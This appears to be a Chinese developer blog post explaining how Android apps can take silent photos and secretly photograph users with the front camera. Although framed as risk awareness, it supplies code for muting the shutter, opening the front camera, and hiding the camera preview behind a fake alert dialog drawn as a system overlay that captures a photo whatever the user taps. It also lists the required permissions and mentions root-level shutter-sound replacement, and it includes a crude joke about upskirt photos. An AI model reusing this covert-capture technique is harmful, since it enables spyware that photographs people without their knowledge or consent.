Android安全问题 静音拍照与被拍

之前写过一些android手机root之后的安全问题的（文章列表见末尾），其实我是想到哪就写到了，今天整理硬盘，发现一年之前写过一段代码，所以今天我们就一起来讨论一下。

注：这里不是讨论多nb的技术，而是希望不了解android风险的人了解我们所处的状态

导读：

本文介绍了所谓的静音拍照是如何实现的（当然这也是一种恶意软件，只不过受害的不是用户），和用户自己如何被恶意软件拍照的

由于iteye不允许偷和拍放到一起，所以……静音拍照，大家懂的，静音拍照？不就是……

今天的主题是静音拍照与被拍

当然，这里的“被拍”不是指你拿着手机在地铁上深入女同学裙下的女同学（貌似日本人喜欢干这种事情，自行百度其新闻）

这里指的被拍是：你玩着玩着游戏，突然前置摄像头被恶意应用打开，然后咔嚓，然后……

想要实现这些功能，很遗憾，即是没有root权限也可以

下面我们来说正题

首先说静音拍照

其实也就是说静音拍照嘛，怎么实现？当然是先静音再拍照了……最后记得恢复静音前的状态即可。

有的手机直接调解照相快门音量即可，但是没有通用的api，似乎这种手机也很少（第三方的rom可能会有）

另一个办法就是把手机调成静音模式，然后拍照。不过也不是理想的，有些手机虽然调成了静音模式，但是快门不静音，就像闹钟不静音一样。

还有一些其他的静音方式，这里就不说了。如何把手机调成静音？这个没什么技术含量，大家可自行百度。。。

mAudioManager = (AudioManager) getSystemService(Context.AUDIO_SERVICE);
mAudioManager.setRingerMode(AudioManager.RINGER_MODE_SILENT);

当然，你最好先记录下用户之前的模式

int ringerMode = mAudioManager.getRingerMode();

这样部分手机的静音拍照就搞定了，比如我使用的g14(android 2.3)就可以达到静音的目的了（所以说htc手机操蛋，现在及其反感htc）

下面说一下被拍

被拍呢，我会选择前置摄像头，玩手机的时候一般人不看手机屁股，因为htc嘛

首先说一下android的摄像头

前置摄像头的通用api是在2.3才开始有的，2.2及之前都需要靠反射调用，不过那时有前置摄像头的android手机也很少

这里我们以2.3为基础作为演示

步骤：

0.伪装

1.打开前置摄像头

2.静音+拍照+退出

3.保存

首先来看看如何调用前置摄像头（当然，你得有前置摄像头才行）

mCamera = openCamera(CameraInfo.CAMERA_FACING_FRONT);
public static Camera openCamera(int which) {
    return Camera.open(which);
}

如果没Camera不为null，那么就是成功了

最关键的是伪装，android系统中，调用摄像头必须要有预览画面才行，当然，这也是为了安全

所以拍照时必须有一个窗口，也就是你玩着玩着游戏的时候，突然弹出个窗口给你拍个大头贴

用户看到预览画面了，那傻子都知道他被人黑了，所以病毒不能这么傻，它会给自己穿件外套

我做了一件粗糙的外套来给大家演示

当然这个外套比较烂，真正的病毒会做一个很精致，并且比较常见的外套（这样成功率才会高，如果用户手机根本没有股票软件，而我却弹出这么一个对话框，用户再傻也会知道自己中毒了）

下面的操作，无论用户点击确定、取消还是back键，病毒都会拍一张照片然后保存，然后……

camera.xml对应的代码

<?xml version="1.0" encoding="utf-8"?>
<FrameLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:orientation="vertical"
    android:layout_width="300dp"
    android:layout_height="150dp"
    android:background="@color/canvas_background">
    <LinearLayout
        android:layout_width="wrap_content"
        android:layout_height="wrap_content">
        <SurfaceView
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:id="@+id/alert_camera"/>
    </LinearLayout>
    <include layout="@layout/fake"/>
</FrameLayout>

fake.xml对应的代码

<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent"
    android:orientation="vertical">
    <!-- title -->
    <LinearLayout
        android:layout_width="fill_parent"
        android:layout_height="wrap_content"
        android:layout_weight=""
        android:layout_gravity="center_vertical"
        android:background="@color/canvas_background">
        <ImageView
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:layout_margin="10dp"
            android:src="@drawable/ic_dialog_alert"/>
        <TextView
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:layout_marginTop="10dp"
            android:layout_marginBottom="10dp"
            android:id="@+id/alert_title"
            android:text="@string/alert_title"
            android:textSize="22sp">
        </TextView>
    </LinearLayout>
    <!-- line -->
    <!-- message -->
    <LinearLayout
        android:layout_width="fill_parent"
        android:layout_height="wrap_content"
        android:layout_weight=""
        android:layout_gravity="center_vertical"
        android:background="@color/canvas_background">
        <TextView
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:layout_margin="10dp"
            android:id="@+id/alert_message"
            android:text="@string/alert_message"
            android:textSize="18sp">
        </TextView>
    </LinearLayout>
    <!-- line -->
    <!-- button -->
    <LinearLayout
        android:layout_width="fill_parent"
        android:layout_height="wrap_content"
        android:orientation="horizontal"
        android:layout_weight=""
        android:background="@color/button_background">
        <Button
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:layout_weight=""
            android:id="@+id/alert_ok"
            android:text="@string/alert_ok"/>
        <Button
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:layout_weight=""
            android:id="@+id/alert_cancel"
            android:text="@string/alert_cancel"/>
    </LinearLayout>
</LinearLayout>

ic_dialog_alert.png就是上图显示的叹号，在frameworks/base/core/res下面就有，复制出来一个就行

上面只是布局代码，我们的activity也需要做一些设置，比如在manifest里要设置主题为

android:theme="@android:style/Theme.Dialog"

在onCreate里面要设置下面这些属性，我就不一一解释了

requestWindowFeature(Window.FEATURE_NO_TITLE);
Window window = getWindow();
window.setFormat(PixelFormat.TRANSLUCENT);
window.setType(WindowManager.LayoutParams.TYPE_SYSTEM_ALERT);
window.setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN,
        WindowManager.LayoutParams.FLAG_FULLSCREEN);
setContentView(R.layout.camera);

到这里，关键的地方就都完成了

manifest中还需要配置一些权限

<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>

正常的拍照流程代码网上很多，我也不贴了，最后附上的colors.xml文件吧

<resources>
    <color name="button_background">#ffffff</color>
    <color name="canvas_background">#ffffffcc</color>
</resources>  

最后再说两句，如果有了root权限，那么病毒就可以替换快门声的音频文件，或者数据库存储指向快门声音的Uri，这样就能彻底的实现静音拍照了

当然，你想静音拍照别人，没准你也被别人静音拍照了，自重